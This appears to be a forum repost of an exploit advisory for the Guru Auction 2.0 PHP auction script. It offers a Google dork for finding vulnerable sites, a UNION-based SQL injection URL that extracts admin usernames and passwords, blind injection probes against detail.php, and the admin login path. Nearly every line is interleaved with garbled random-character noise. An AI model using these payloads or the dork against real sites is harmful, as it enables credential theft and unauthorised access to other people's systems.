Guru Auction 2.0 Multiple SQL Injection Vulnerabilities& _' J( i$ _8 \3 l
+ }- Y$ @- ?. m( C6 ]作者 : v3n0m' ?! D* T5 F% w& h5 k5 M3 z
应用 : Guru Auction 2.0
* g4 ^ y l1 QPrice : $49
, t# P6 i* Y/ D: Z3 J8 Q4 OVendor : http://www.guruscript.com/
, x& K) j# c8 T# ?' [ Z( ^Google Dork : inurl:subcat.php?cate_id=
$ s( @/ A# }+ f# L! } 7 B8 E; x7 j+ A: p
SQLi p0c:
) C7 k7 g6 V, A: _/ _; [5 i1 M a~~~~~~~~~~
- F! l1 O; w2 chttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--, K, R& R# ~$ f) u1 R6 {
! d$ E/ g. y" @; j; s6 v0 [
0 C6 |2 }; @* m+ U* A0 u盲注 p0c:
6 F/ f) c1 L# `. }~~~~~~~~~~( i6 K+ E+ q. k3 B
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
* j' y( H% V- \; ~http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
8 D$ `; q( h, H
. l: ~ n5 d& U4 P管理登录入口:, t2 Z, \: T+ u f) `5 k
~~~~~~~~~~) ^( E$ Q& L* v9 ?0 t/ z
http://domain.tld/[path]/admin/
; `" y8 Z8 a& _' P |
发表于 2012-12-31 09:24:05
收藏
支持
反对